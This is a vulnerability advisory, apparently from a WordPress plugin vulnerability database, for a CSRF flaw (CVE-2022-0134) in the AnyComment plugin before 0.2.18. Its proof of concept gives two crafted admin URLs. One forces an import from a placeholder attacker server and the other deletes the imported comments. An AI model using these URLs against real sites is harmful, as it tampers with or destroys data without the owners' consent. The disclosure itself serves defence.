AnyComment < 0.2.18 – Arbitrary HyperComments Import/Revert via CSRF | CVE 2022-0134 | Plugin Vulnerabilities

Description

The plugin does not have CSRF checks in the Import and Revert HyperComments features, allowing attackers to make logged in admin perform such actions via a CSRF attack

Proof of Concept

Go to https://example.com/wordpress/wp-admin/admin.php?r=import%2Fhypercomments&url=http://<your_server>, and you will see a get request in your server logs indicating that the import request is done. 

To revert the imports (ie delete all imported comments): https://example.com/wp-admin/admin.php?r=import%2Fhypercomments&revert=1

https://www.youtube.com/watch?v=75BH2m8cmPo

Affects Plugins

Fixed in 0.2.18

References

CVE

YouTube Video

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

Brandon Roldan

Submitter

Brandon Roldan

Submitter website

https://noobexploiter.github.io/

Submitter twitter

Verified

Yes

WPVDB ID

fa09ea9b-d5a0-4773-a692-9ff0200bcd85

Timeline

Publicly Published

2022-01-19 (about 3 years ago)

Added

2022-01-19 (about 3 years ago)

Last Updated

2022-04-10 (about 3 years ago)

Other

Published

Title

Published

2024-01-31

Title

JTRT Responsive Tables <= 4.1.9 - Cross-Site Request Forgery

Published

2024-04-10

Title

Marker.io < 1.1.9 - Cross-Site Request Forgery

Published

2025-09-05

Title

Responder < 4.4.0 - Cross-Site Request Forgery

Published

2025-03-24

Title

Generate Post Thumbnails <= 0.8 - Cross-Site Request Forgery

Published

2025-01-07

Title

Virtual Bot <= 1.0.0 - Cross-Site Request Forgery to Stored Cross-Site Scripting